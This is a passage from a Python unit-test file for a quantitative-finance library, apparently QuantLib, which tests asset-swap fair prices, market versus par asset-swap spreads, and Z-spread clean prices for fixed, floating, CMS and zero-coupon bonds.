+ "\n fair clean price: " + str(assetSwap5.fairCleanPrice())
+ "\n NPV: " + str(assetSwap5.NPV())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(assetSwap5.fairSpread() - fairSpread)>tolerance,
"\nmarket asset swap fair spread doesn't equal input spread at zero NPV: "
+ "\n input spread: " + str(fairSpread)
+ "\n fair spread: " + str(assetSwap5.fairSpread())
+ "\n NPV: " + str(assetSwap5.NPV())
+ "\n tolerance: " + str(tolerance))
def testImpliedValue(self):
"""Testing implied bond value against asset-swap fair price with null spread..."""
bondCalendar = TARGET()
settlementDays = 3
fixingDays = 2
payFixedRate = True
parAssetSwap = True
inArrears = False
## Fixed Underlying bond (Isin: DE0001135275 DBR 4 01/04/37)
## maturity doesn't occur on a business day
fixedBondSchedule1 = Schedule(Date(4,January,2005),
Date(4,January,2037),
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
fixedBond1 = FixedRateBond(settlementDays, self.faceAmount,
fixedBondSchedule1,
[0.04],
ActualActual(ActualActual.ISDA),
Following,
100.0, Date(4,January,2005))
bondEngine = DiscountingBondEngine(self.termStructure)
swapEngine = DiscountingSwapEngine(self.termStructure, False)
fixedBond1.setPricingEngine(bondEngine)
fixedBondPrice1 = fixedBond1.cleanPrice()
fixedBondAssetSwap1 = AssetSwap(payFixedRate,
fixedBond1, fixedBondPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
fixedBondAssetSwap1.setPricingEngine(swapEngine)
fixedBondAssetSwapPrice1 = fixedBondAssetSwap1.fairCleanPrice()
tolerance = 1.0e-13
error1 = abs(fixedBondAssetSwapPrice1-fixedBondPrice1)
self.assertFalse(error1>tolerance,
"wrong zero spread asset swap price for fixed bond:"
+ "\n bond's clean price: " + str(fixedBondPrice1)
+ "\n asset swap fair price: " + str(fixedBondAssetSwapPrice1)
+ "\n error: " + str(error1)
+ "\n tolerance: " + str(tolerance))
## Fixed Underlying bond (Isin: IT0006527060 IBRD 5 02/05/19)
## maturity occurs on a business day
fixedBondSchedule2 = Schedule(Date(5,February,2005),
Date(5,February,2019),
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
fixedBond2 = FixedRateBond(settlementDays, self.faceAmount,
fixedBondSchedule2,
[0.05],
Thirty360(Thirty360.BondBasis),
Following,
100.0, Date(5,February,2005))
fixedBond2.setPricingEngine(bondEngine)
fixedBondPrice2 = fixedBond2.cleanPrice()
fixedBondAssetSwap2 = AssetSwap(payFixedRate,
fixedBond2, fixedBondPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
fixedBondAssetSwap2.setPricingEngine(swapEngine)
fixedBondAssetSwapPrice2 = fixedBondAssetSwap2.fairCleanPrice()
error2 = abs(fixedBondAssetSwapPrice2-fixedBondPrice2)
self.assertFalse(error2>tolerance,
"wrong zero spread asset swap price for fixed bond:"
+ "\n bond's clean price: " + str(fixedBondPrice2)
+ "\n asset swap fair price: " + str(fixedBondAssetSwapPrice2)
+ "\n error: " + str(error2)
+ "\n tolerance: " + str(tolerance))
## FRN Underlying bond (Isin: IT0003543847 ISPIM 0 09/29/13)
## maturity doesn't occur on a business day
floatingBondSchedule1 = Schedule(Date(29,September,2003),
Date(29,September,2013),
Period(Semiannual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
floatingBond1 =FloatingRateBond(settlementDays, self.faceAmount,
floatingBondSchedule1,
self.iborIndex, Actual360(),
Following, fixingDays,
[1],
[0.0056],
[],
[],
inArrears,
100.0, Date(29,September,2003))
floatingBond1.setPricingEngine(bondEngine)
setCouponPricer(floatingBond1.cashflows(), self.pricer)
self.iborIndex.addFixing(Date(27,March,2007), 0.0402)
floatingBondPrice1 = floatingBond1.cleanPrice()
floatingBondAssetSwap1 = AssetSwap(payFixedRate,
floatingBond1, floatingBondPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
floatingBondAssetSwap1.setPricingEngine(swapEngine)
floatingBondAssetSwapPrice1 = floatingBondAssetSwap1.fairCleanPrice()
error3 = abs(floatingBondAssetSwapPrice1-floatingBondPrice1)
self.assertFalse(error3>tolerance,
"wrong zero spread asset swap price for floater:"
+ "\n bond's clean price: " + str(floatingBondPrice1)
+ "\n asset swap fair price: " + str(floatingBondAssetSwapPrice1)
+ "\n error: " + str(error3)
+ "\n tolerance: " + str(tolerance))
## FRN Underlying bond (Isin: XS0090566539 COE 0 09/24/18)
## maturity occurs on a business day
floatingBondSchedule2 = Schedule(Date(24,September,2004),
Date(24,September,2018),
Period(Semiannual), bondCalendar,
ModifiedFollowing, ModifiedFollowing,
DateGeneration.Backward, False)
floatingBond2 = FloatingRateBond(settlementDays, self.faceAmount,
floatingBondSchedule2,
self.iborIndex, Actual360(),
ModifiedFollowing, fixingDays,
[1],
[0.0025],
[],
[],
inArrears,
100.0, Date(24,September,2004))
floatingBond2.setPricingEngine(bondEngine)
setCouponPricer(floatingBond2.cashflows(), self.pricer)
self.iborIndex.addFixing(Date(22,March,2007), 0.04013)
currentCoupon=0.04013+0.0025
floatingCurrentCoupon= floatingBond2.nextCouponRate()
error4= abs(floatingCurrentCoupon-currentCoupon)
self.assertFalse(error4>tolerance,
"wrong current coupon is returned for floater bond:"
+ "\n bond's calculated current coupon: " + str(currentCoupon)
+ "\n current coupon asked to the bond: " + str(floatingCurrentCoupon)
+ "\n error: " + str(error4)
+ "\n tolerance: " + str(tolerance))
floatingBondPrice2 = floatingBond2.cleanPrice()
floatingBondAssetSwap2 = AssetSwap(payFixedRate,
floatingBond2, floatingBondPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
floatingBondAssetSwap2.setPricingEngine(swapEngine)
floatingBondAssetSwapPrice2 = floatingBondAssetSwap2.fairCleanPrice()
error5 = abs(floatingBondAssetSwapPrice2-floatingBondPrice2)
self.assertFalse(error5>tolerance,
"wrong zero spread asset swap price for floater:"
+ "\n bond's clean price: " + str(floatingBondPrice2)
+ "\n asset swap fair price: " + str(floatingBondAssetSwapPrice2)
+ "\n error: " + str(error5)
+ "\n tolerance: " + str(tolerance))
## CMS Underlying bond (Isin: XS0228052402 CRDIT 0 8/22/20)
## maturity doesn't occur on a business day
cmsBondSchedule1 = Schedule(Date(22,August,2005),
Date(22,August,2020),
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
cmsBond1 = CmsRateBond(settlementDays, self.faceAmount,
cmsBondSchedule1,
self.swapIndex, Thirty360(),
Following, fixingDays,
[1.0],
[0.0],
[0.055],
[0.025],
inArrears,
100.0, Date(22,August,2005))
cmsBond1.setPricingEngine(bondEngine)
setCouponPricer(cmsBond1.cashflows(), self.cmspricer)
self.swapIndex.addFixing(Date(18,August,2006), 0.04158)
cmsBondPrice1 = cmsBond1.cleanPrice()
cmsBondAssetSwap1 = AssetSwap(payFixedRate,
cmsBond1, cmsBondPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
cmsBondAssetSwap1.setPricingEngine(swapEngine)
cmsBondAssetSwapPrice1 = cmsBondAssetSwap1.fairCleanPrice()
error6 = abs(cmsBondAssetSwapPrice1-cmsBondPrice1)
self.assertFalse(error6>tolerance,
"wrong zero spread asset swap price for cms bond:"
+ "\n bond's clean price: " + str(cmsBondPrice1)
+ "\n asset swap fair price: " + str(cmsBondAssetSwapPrice1)
+ "\n error: " + str(error6)
+ "\n tolerance: " + str(tolerance))
## CMS Underlying bond (Isin: XS0218766664 ISPIM 0 5/6/15)
## maturity occurs on a business day
cmsBondSchedule2 = Schedule(Date(6,May,2005),
Date(6,May,2015),
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
cmsBond2 = CmsRateBond(settlementDays, self.faceAmount, cmsBondSchedule2,
self.swapIndex, Thirty360(),
Following, fixingDays,
[0.84], [0.0],
[], [],
inArrears,
100.0, Date(6,May,2005))
cmsBond2.setPricingEngine(bondEngine)
setCouponPricer(cmsBond2.cashflows(), self.cmspricer)
self.swapIndex.addFixing(Date(4,May,2006), 0.04217)
cmsBondPrice2 = cmsBond2.cleanPrice()
cmsBondAssetSwap2 = AssetSwap(payFixedRate,
cmsBond2, cmsBondPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
cmsBondAssetSwap2.setPricingEngine(swapEngine)
cmsBondAssetSwapPrice2 = cmsBondAssetSwap2.fairCleanPrice()
error7 = abs(cmsBondAssetSwapPrice2-cmsBondPrice2)
self.assertFalse(error7>tolerance,
"wrong zero spread asset swap price for cms bond:"
+ "\n bond's clean price: " + str(cmsBondPrice2)
+ "\n asset swap fair price: " + str(cmsBondAssetSwapPrice2)
+ "\n error: " + str(error7)
+ "\n tolerance: " + str(tolerance))
## Zero Coupon bond (Isin: DE0004771662 IBRD 0 12/20/15)
## maturity doesn't occur on a business day
zeroCpnBond1 = ZeroCouponBond(settlementDays, bondCalendar, self.faceAmount,
Date(20,December,2015),
Following,
100.0, Date(19,December,1985))
zeroCpnBond1.setPricingEngine(bondEngine)
zeroCpnBondPrice1 = zeroCpnBond1.cleanPrice()
zeroCpnAssetSwap1 = AssetSwap(payFixedRate,
zeroCpnBond1, zeroCpnBondPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
zeroCpnAssetSwap1.setPricingEngine(swapEngine)
zeroCpnBondAssetSwapPrice1 = zeroCpnAssetSwap1.fairCleanPrice()
error8 = abs(cmsBondAssetSwapPrice1-cmsBondPrice1)
self.assertFalse(error8>tolerance,
"wrong zero spread asset swap price for zero cpn bond:"
+ "\n bond's clean price: " + str(zeroCpnBondPrice1)
+ "\n asset swap fair price: " + str(zeroCpnBondAssetSwapPrice1)
+ "\n error: " + str(error8)
+ "\n tolerance: " + str(tolerance))
## Zero Coupon bond (Isin: IT0001200390 ISPIM 0 02/17/28)
## maturity occurs on a business day
zeroCpnBond2 = ZeroCouponBond(settlementDays, bondCalendar, self.faceAmount,
Date(17,February,2028),
Following,
100.0, Date(17,February,1998))
zeroCpnBond2.setPricingEngine(bondEngine)
zeroCpnBondPrice2 = zeroCpnBond2.cleanPrice()
zeroCpnAssetSwap2 = AssetSwap(payFixedRate,
zeroCpnBond2, zeroCpnBondPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
zeroCpnAssetSwap2.setPricingEngine(swapEngine)
zeroCpnBondAssetSwapPrice2 = zeroCpnAssetSwap2.fairCleanPrice()
error9 = abs(cmsBondAssetSwapPrice2-cmsBondPrice2)
self.assertFalse(error9>tolerance,
"wrong zero spread asset swap price for zero cpn bond:"
+ "\n bond's clean price: " + str(zeroCpnBondPrice2)
+ "\n asset swap fair price: " + str(zeroCpnBondAssetSwapPrice2)
+ "\n error: " + str(error9)
+ "\n tolerance: " + str(tolerance))
def testMarketASWSpread(self) :
"""Testing relationship between market asset swap and par asset swap..."""
bondCalendar = TARGET()
settlementDays = 3
fixingDays = 2
payFixedRate = True
parAssetSwap = True
mktAssetSwap = False
inArrears = False
## Fixed Underlying bond (Isin: DE0001135275 DBR 4 01/04/37)
## maturity doesn't occur on a business day
fixedBondSchedule1 = Schedule (Date(4,January,2005),
Date(4,January,2037),
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
fixedBond1 = FixedRateBond(settlementDays, self.faceAmount, fixedBondSchedule1,
[0.04],
ActualActual(ActualActual.ISDA), Following,
100.0, Date(4,January,2005))
bondEngine = DiscountingBondEngine(self.termStructure)
swapEngine = DiscountingSwapEngine(self.termStructure,False)
fixedBond1.setPricingEngine(bondEngine)
fixedBondMktPrice1 = 89.22 ## market price observed on 7th June 2007
fixedBondMktFullPrice1=fixedBondMktPrice1+fixedBond1.accruedAmount()
fixedBondParAssetSwap1 = AssetSwap(payFixedRate,
fixedBond1, fixedBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
fixedBondParAssetSwap1.setPricingEngine(swapEngine)
fixedBondParAssetSwapSpread1 = fixedBondParAssetSwap1.fairSpread()
fixedBondMktAssetSwap1 = AssetSwap(payFixedRate,
fixedBond1, fixedBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
mktAssetSwap)
fixedBondMktAssetSwap1.setPricingEngine(swapEngine)
fixedBondMktAssetSwapSpread1 = fixedBondMktAssetSwap1.fairSpread()
tolerance = 1.0e-13
error1 = abs(fixedBondMktAssetSwapSpread1-
100*fixedBondParAssetSwapSpread1/fixedBondMktFullPrice1)
self.assertFalse (error1>tolerance,
"wrong asset swap spreads for fixed bond:"
+ "\n market ASW spread: " + str(fixedBondMktAssetSwapSpread1)
+ "\n par ASW spread: " + str(fixedBondParAssetSwapSpread1)
+ "\n error: " + str(error1)
+ "\n tolerance: " + str(tolerance))
## Fixed Underlying bond (Isin: IT0006527060 IBRD 5 02/05/19)
## maturity occurs on a business day
fixedBondSchedule2 = Schedule(Date(5,February,2005),
Date(5,February,2019),
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
fixedBond2 =FixedRateBond(settlementDays, self.faceAmount, fixedBondSchedule2,
[0.05],
Thirty360(Thirty360.BondBasis), Following,
100.0, Date(5,February,2005))
fixedBond2.setPricingEngine(bondEngine)
fixedBondMktPrice2 = 99.98 ## market price observed on 7th June 2007
fixedBondMktFullPrice2 = fixedBondMktPrice2+fixedBond2.accruedAmount()
fixedBondParAssetSwap2 = AssetSwap (payFixedRate,
fixedBond2, fixedBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
fixedBondParAssetSwap2.setPricingEngine(swapEngine)
fixedBondParAssetSwapSpread2 = fixedBondParAssetSwap2.fairSpread()
fixedBondMktAssetSwap2 = AssetSwap(payFixedRate,
fixedBond2, fixedBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
mktAssetSwap)
fixedBondMktAssetSwap2.setPricingEngine(swapEngine)
fixedBondMktAssetSwapSpread2 = fixedBondMktAssetSwap2.fairSpread()
error2 = abs(fixedBondMktAssetSwapSpread2-
100*fixedBondParAssetSwapSpread2/fixedBondMktFullPrice2)
self.assertFalse(error2>tolerance,
"wrong asset swap spreads for fixed bond:"
+ "\n market ASW spread: " + str(fixedBondMktAssetSwapSpread2)
+ "\n par ASW spread: " + str(fixedBondParAssetSwapSpread2)
+ "\n error: " + str(error2)
+ "\n tolerance: " + str(tolerance))
## FRN Underlying bond (Isin: IT0003543847 ISPIM 0 09/29/13)
## maturity doesn't occur on a business day
floatingBondSchedule1 = Schedule(Date(29,September,2003),
Date(29,September,2013),
Period(Semiannual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
floatingBond1 = FloatingRateBond(settlementDays, self.faceAmount,
floatingBondSchedule1,
self.iborIndex, Actual360(),
Following, fixingDays,
[1], [0.0056],
[],[],
inArrears,
100.0, Date(29,September,2003))
floatingBond1.setPricingEngine(bondEngine)
setCouponPricer(floatingBond1.cashflows(), self.pricer)
self.iborIndex.addFixing(Date(27,March,2007), 0.0402)
## market price observed on 7th June 2007
floatingBondMktPrice1 = 101.64
floatingBondMktFullPrice1 = floatingBondMktPrice1+floatingBond1.accruedAmount()
floatingBondParAssetSwap1 = AssetSwap(payFixedRate,
floatingBond1, floatingBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
floatingBondParAssetSwap1.setPricingEngine(swapEngine)
floatingBondParAssetSwapSpread1 = floatingBondParAssetSwap1.fairSpread()
floatingBondMktAssetSwap1 = AssetSwap(payFixedRate,
floatingBond1, floatingBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
mktAssetSwap)
floatingBondMktAssetSwap1.setPricingEngine(swapEngine)
floatingBondMktAssetSwapSpread1 = floatingBondMktAssetSwap1.fairSpread()
error3 = abs(floatingBondMktAssetSwapSpread1-
100*floatingBondParAssetSwapSpread1/floatingBondMktFullPrice1)
self.assertFalse(error3>tolerance,
"wrong asset swap spreads for floating bond:"
+ "\n market ASW spread: " + str(floatingBondMktAssetSwapSpread1)
+ "\n par ASW spread: " + str(floatingBondParAssetSwapSpread1)
+ "\n error: " + str(error3)
+ "\n tolerance: " + str(tolerance))
## FRN Underlying bond (Isin: XS0090566539 COE 0 09/24/18)
## maturity occurs on a business day
floatingBondSchedule2 = Schedule (Date(24,September,2004),
Date(24,September,2018),
Period(Semiannual), bondCalendar,
ModifiedFollowing, ModifiedFollowing,
DateGeneration.Backward, False)
floatingBond2 = FloatingRateBond(settlementDays, self.faceAmount,
floatingBondSchedule2,
self.iborIndex, Actual360(),
ModifiedFollowing, fixingDays,
[1], [0.0025],
[], [],
inArrears,
100.0, Date(24,September,2004))
floatingBond2.setPricingEngine(bondEngine)
setCouponPricer(floatingBond2.cashflows(), self.pricer)
self.iborIndex.addFixing(Date(22,March,2007), 0.04013)
## market price observed on 7th June 2007
floatingBondMktPrice2 = 101.248
floatingBondMktFullPrice2 = floatingBondMktPrice2+floatingBond2.accruedAmount()
floatingBondParAssetSwap2 = AssetSwap (payFixedRate,
floatingBond2, floatingBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
floatingBondParAssetSwap2.setPricingEngine(swapEngine)
floatingBondParAssetSwapSpread2 = floatingBondParAssetSwap2.fairSpread()
floatingBondMktAssetSwap2 = AssetSwap(payFixedRate,
floatingBond2, floatingBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
mktAssetSwap)
floatingBondMktAssetSwap2.setPricingEngine(swapEngine)
floatingBondMktAssetSwapSpread2 = floatingBondMktAssetSwap2.fairSpread()
error4 = abs(floatingBondMktAssetSwapSpread2-
100*floatingBondParAssetSwapSpread2/floatingBondMktFullPrice2)
self.assertFalse(error4>tolerance ,
"wrong asset swap spreads for floating bond:"
+ "\n market ASW spread: " + str(floatingBondMktAssetSwapSpread2)
+ "\n par ASW spread: " + str(floatingBondParAssetSwapSpread2)
+ "\n error: " + str(error4)
+ "\n tolerance: " + str(tolerance))
## CMS Underlying bond (Isin: XS0228052402 CRDIT 0 8/22/20)
## maturity doesn't occur on a business day
cmsBondSchedule1 = Schedule(Date(22,August,2005),
Date(22,August,2020),
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
cmsBond1 = CmsRateBond(settlementDays, self.faceAmount, cmsBondSchedule1,
self.swapIndex, Thirty360(),
Following, fixingDays,
[1,1.0], [0.0],
[0.055], [0.025],
inArrears,
100.0, Date(22,August,2005))
cmsBond1.setPricingEngine(bondEngine)
setCouponPricer(cmsBond1.cashflows(), self.cmspricer)
self.swapIndex.addFixing(Date(18,August,2006), 0.04158)
cmsBondMktPrice1 = 88.45 ## market price observed on 7th June 2007
cmsBondMktFullPrice1 = cmsBondMktPrice1+cmsBond1.accruedAmount()
cmsBondParAssetSwap1 = AssetSwap(payFixedRate,
cmsBond1, cmsBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
cmsBondParAssetSwap1.setPricingEngine(swapEngine)
cmsBondParAssetSwapSpread1 = cmsBondParAssetSwap1.fairSpread()
cmsBondMktAssetSwap1 = AssetSwap(payFixedRate,
cmsBond1, cmsBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
mktAssetSwap)
cmsBondMktAssetSwap1.setPricingEngine(swapEngine)
cmsBondMktAssetSwapSpread1 = cmsBondMktAssetSwap1.fairSpread()
error5 = abs(cmsBondMktAssetSwapSpread1-
100*cmsBondParAssetSwapSpread1/cmsBondMktFullPrice1)
self.assertFalse(error5>tolerance,
"wrong asset swap spreads for cms bond:"
+ "\n market ASW spread: " + str(cmsBondMktAssetSwapSpread1)
+ "\n par ASW spread: " + str(cmsBondParAssetSwapSpread1)
+ "\n error: " + str(error5)
+ "\n tolerance: " + str(tolerance))
## CMS Underlying bond (Isin: XS0218766664 ISPIM 0 5/6/15)
## maturity occurs on a business day
cmsBondSchedule2 = Schedule(Date(6,May,2005),
Date(6,May,2015),
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
cmsBond2 = CmsRateBond(settlementDays, self.faceAmount, cmsBondSchedule2,
self.swapIndex, Thirty360(),
Following, fixingDays,
[0.84], [0.0],
[], [],
inArrears,
100.0, Date(6,May,2005))
cmsBond2.setPricingEngine(bondEngine)
setCouponPricer(cmsBond2.cashflows(), self.cmspricer)
self.swapIndex.addFixing(Date(4,May,2006), 0.04217)
cmsBondMktPrice2 = 94.08 ## market price observed on 7th June 2007
cmsBondMktFullPrice2 = cmsBondMktPrice2+cmsBond2.accruedAmount()
cmsBondParAssetSwap2 = AssetSwap(payFixedRate,
cmsBond2, cmsBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
cmsBondParAssetSwap2.setPricingEngine(swapEngine)
cmsBondParAssetSwapSpread2 = cmsBondParAssetSwap2.fairSpread()
cmsBondMktAssetSwap2 = AssetSwap(payFixedRate,
cmsBond2, cmsBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
mktAssetSwap)
cmsBondMktAssetSwap2.setPricingEngine(swapEngine)
cmsBondMktAssetSwapSpread2 = cmsBondMktAssetSwap2.fairSpread()
error6 = abs(cmsBondMktAssetSwapSpread2-
100*cmsBondParAssetSwapSpread2/cmsBondMktFullPrice2)
self.assertFalse(error6>tolerance,
"wrong asset swap spreads for cms bond:"
+ "\n market ASW spread: " + str(cmsBondMktAssetSwapSpread2)
+ "\n par ASW spread: " + str(cmsBondParAssetSwapSpread2)
+ "\n error: " + str(error6)
+ "\n tolerance: " + str(tolerance))
## Zero Coupon bond (Isin: DE0004771662 IBRD 0 12/20/15)
## maturity doesn't occur on a business day
zeroCpnBond1 = ZeroCouponBond(settlementDays, bondCalendar, self.faceAmount,
Date(20,December,2015),
Following,
100.0, Date(19,December,1985))
zeroCpnBond1.setPricingEngine(bondEngine)
## market price observed on 12th June 2007
zeroCpnBondMktPrice1 = 70.436
zeroCpnBondMktFullPrice1 = zeroCpnBondMktPrice1+zeroCpnBond1.accruedAmount()
zeroCpnBondParAssetSwap1 = AssetSwap(payFixedRate,zeroCpnBond1,
zeroCpnBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
zeroCpnBondParAssetSwap1.setPricingEngine(swapEngine)
zeroCpnBondParAssetSwapSpread1 = zeroCpnBondParAssetSwap1.fairSpread()
zeroCpnBondMktAssetSwap1 = AssetSwap(payFixedRate,zeroCpnBond1,
zeroCpnBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
mktAssetSwap)
zeroCpnBondMktAssetSwap1.setPricingEngine(swapEngine)
zeroCpnBondMktAssetSwapSpread1 = zeroCpnBondMktAssetSwap1.fairSpread()
error7 = abs(zeroCpnBondMktAssetSwapSpread1-
100*zeroCpnBondParAssetSwapSpread1/zeroCpnBondMktFullPrice1)
self.assertFalse(error7>tolerance,
"wrong asset swap spreads for zero cpn bond:"
+ "\n market ASW spread: " + str(zeroCpnBondMktAssetSwapSpread1)
+ "\n par ASW spread: " + str(zeroCpnBondParAssetSwapSpread1)
+ "\n error: " + str(error7)
+ "\n tolerance: " + str(tolerance))
## Zero Coupon bond (Isin: IT0001200390 ISPIM 0 02/17/28)
## maturity occurs on a business day
zeroCpnBond2 =ZeroCouponBond(settlementDays, bondCalendar, self.faceAmount,
Date(17,February,2028),
Following,
100.0, Date(17,February,1998))
zeroCpnBond2.setPricingEngine(bondEngine)
## zeroCpnBondPrice2 = zeroCpnBond2.cleanPrice()
## market price observed on 12th June 2007
zeroCpnBondMktPrice2 = 35.160
zeroCpnBondMktFullPrice2 = zeroCpnBondMktPrice2+zeroCpnBond2.accruedAmount()
zeroCpnBondParAssetSwap2 = AssetSwap(payFixedRate,zeroCpnBond2,
zeroCpnBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
zeroCpnBondParAssetSwap2.setPricingEngine(swapEngine)
zeroCpnBondParAssetSwapSpread2 = zeroCpnBondParAssetSwap2.fairSpread()
zeroCpnBondMktAssetSwap2 = AssetSwap(payFixedRate,zeroCpnBond2,
zeroCpnBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
mktAssetSwap)
zeroCpnBondMktAssetSwap2.setPricingEngine(swapEngine)
zeroCpnBondMktAssetSwapSpread2 = zeroCpnBondMktAssetSwap2.fairSpread()
error8 = abs(zeroCpnBondMktAssetSwapSpread2-
100*zeroCpnBondParAssetSwapSpread2/zeroCpnBondMktFullPrice2)
self.assertFalse(error8>tolerance,
"wrong asset swap spreads for zero cpn bond:"
+ "\n market ASW spread: " + str(zeroCpnBondMktAssetSwapSpread2)
+ "\n par ASW spread: " + str(zeroCpnBondParAssetSwapSpread2)
+ "\n error: " + str(error8)
+ "\n tolerance: " + str(tolerance))
def testZSpread(self) :
"""Testing clean and dirty price with null Z-spread against theoretical prices..."""
bondCalendar = TARGET()
settlementDays = 3
fixingDays = 2
inArrears = False
## Fixed bond (Isin: DE0001135275 DBR 4 01/04/37)
## maturity doesn't occur on a business day
fixedBondSchedule1 = Schedule(Date(4,January,2005),
Date(4,January,2037),
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
fixedBond1 = FixedRateBond(settlementDays, self.faceAmount, fixedBondSchedule1,
[0.04],
ActualActual(ActualActual.ISDA), Following,
100.0, Date(4,January,2005))
bondEngine = DiscountingBondEngine(self.termStructure)
fixedBond1.setPricingEngine(bondEngine)
fixedBondImpliedValue1 = fixedBond1.cleanPrice()
fixedBondSettlementDate1= fixedBond1.settlementDate()
## standard market conventions:
## bond's frequency + coumpounding and daycounter of the YC...
fixedBondCleanPrice1 = cleanPriceFromZSpread(fixedBond1,self.yieldCurve, self.spread,
Actual365Fixed(), self.compounding, Annual,
fixedBondSettlementDate1)
tolerance = 1.0e-13
error1 = abs(fixedBondImpliedValue1-fixedBondCleanPrice1)
self.assertFalse(error1>tolerance,
"wrong clean price for fixed bond:"
+ "\n market asset swap spread: " + str(fixedBondImpliedValue1)
+ "\n par asset swap spread: " + str(fixedBondCleanPrice1)
+ "\n error: " + str(error1)
+ "\n tolerance: " + str(tolerance))
## Fixed bond (Isin: IT0006527060 IBRD 5 02/05/19)
## maturity occurs on a business day
fixedBondSchedule2 = Schedule (Date(5,February,2005),
Date(5,February,2019),
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
fixedBond2 = FixedRateBond(settlementDays, self.faceAmount, fixedBondSchedule2,
[0.05],
Thirty360(Thirty360.BondBasis), Following,
100.0, Date(5,February,2005))
fixedBond2.setPricingEngine(bondEngine)
fixedBondImpliedValue2 = fixedBond2.cleanPrice()
fixedBondSettlementDate2= fixedBond2.settlementDate()
## standard market conventions:
## bond's frequency + coumpounding and daycounter of the YieldCurve
fixedBondCleanPrice2 = cleanPriceFromZSpread(
fixedBond2, self.yieldCurve, self.spread,
Actual365Fixed(), self.compounding, Annual,
fixedBondSettlementDate2)
error3 = abs(fixedBondImpliedValue2-fixedBondCleanPrice2)
self.assertFalse(error3>tolerance,
"wrong clean price for fixed bond:"
+ "\n market asset swap spread: " + str(fixedBondImpliedValue2)
+ "\n par asset swap spread: " + str(fixedBondCleanPrice2)
+ "\n error: " + str(error3)
+ "\n tolerance: " + str(tolerance))
## FRN bond (Isin: IT0003543847 ISPIM 0 09/29/13)
## maturity doesn't occur on a business day
floatingBondSchedule1 = Schedule(Date(29,September,2003),
Date(29,September,2013),
Period(Semiannual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
floatingBond1 = FloatingRateBond(settlementDays, self.faceAmount,
floatingBondSchedule1,
self.iborIndex, Actual360(),
Following, fixingDays,
[1], [0.0056],
[], [],
inArrears,
100.0, Date(29,September,2003))
floatingBond1.setPricingEngine(bondEngine)
setCouponPricer(floatingBond1.cashflows(), self.pricer)
self.iborIndex.addFixing(Date(27,March,2007), 0.0402)
floatingBondImpliedValue1 = floatingBond1.cleanPrice()
floatingBondSettlementDate1= floatingBond1.settlementDate()
## standard market conventions:
## bond's frequency + coumpounding and daycounter of the YieldCurve
floatingBondCleanPrice1 = cleanPriceFromZSpread(
floatingBond1, self.yieldCurve, self.spread,
Actual365Fixed(), self.compounding, Semiannual,
fixedBondSettlementDate1)
error5 = abs(floatingBondImpliedValue1-floatingBondCleanPrice1)
self.assertFalse(error5>tolerance,
"wrong clean price for fixed bond:"
+ "\n market asset swap spread: " + str(floatingBondImpliedValue1)
+ "\n par asset swap spread: " + str(floatingBondCleanPrice1)
+ "\n error: " + str(error5)
+ "\n tolerance: " + str(tolerance))
## FRN bond (Isin: XS0090566539 COE 0 09/24/18)
## maturity occurs on a business day
floatingBondSchedule2 = Schedule(Date(24,September,2004),
Date(24,September,2018),
Period(Semiannual), bondCalendar,
ModifiedFollowing, ModifiedFollowing,
DateGeneration.Backward, False)
floatingBond2 = FloatingRateBond(settlementDays, self.faceAmount,
floatingBondSchedule2,
self.iborIndex, Actual360(),
ModifiedFollowing, fixingDays,
